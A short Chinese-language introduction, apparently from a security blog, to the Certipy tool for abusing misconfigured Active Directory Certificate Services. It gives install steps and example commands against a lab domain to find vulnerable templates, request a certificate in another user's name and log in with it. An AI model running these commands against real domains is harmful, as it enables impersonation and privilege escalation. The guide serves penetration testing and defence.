介绍:
Certipy是一款基于Python开发的强大工具,旨在帮助研究人员枚举并利用活动目录证书服务(AD CS)中的错误配置项。
下载:
<code>git clone https://github.com/ly4k/Certipy.git python3 setup.py install</code>
使用方法:
查找漏洞模板:使用 -vulnerable
参数搜索存在漏洞的证书模板:
<code>certipy 'predator/john:Passw0rd@dc.predator.local' find -vulnerable</code>
自动化:在下面的示例中,用户john是一个低权限用户,可以注册Copy of Web Server模板:
<code>certipy 'predator/john:Passw0rd@dc.predator.local' auto</code>
查询请求:用户josh将以用户jane的身份请求一个有效的身份认证证书:
<code>certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane'</code>
身份认证:用户jane将使用已获得的证书进行身份认证:
<code>certipy 'predator/jane@dc.predator.local' auth -cert ./2.crt -key ./2.key</code>
结果示例:
如果Certipy检测到目标存在漏洞,将会提供相应的结果,可以根据GitHub上的步骤逐步操作:
https://github.com/ly4k/Certipy#domain-escalation
© 版权声明
THE END
暂无评论内容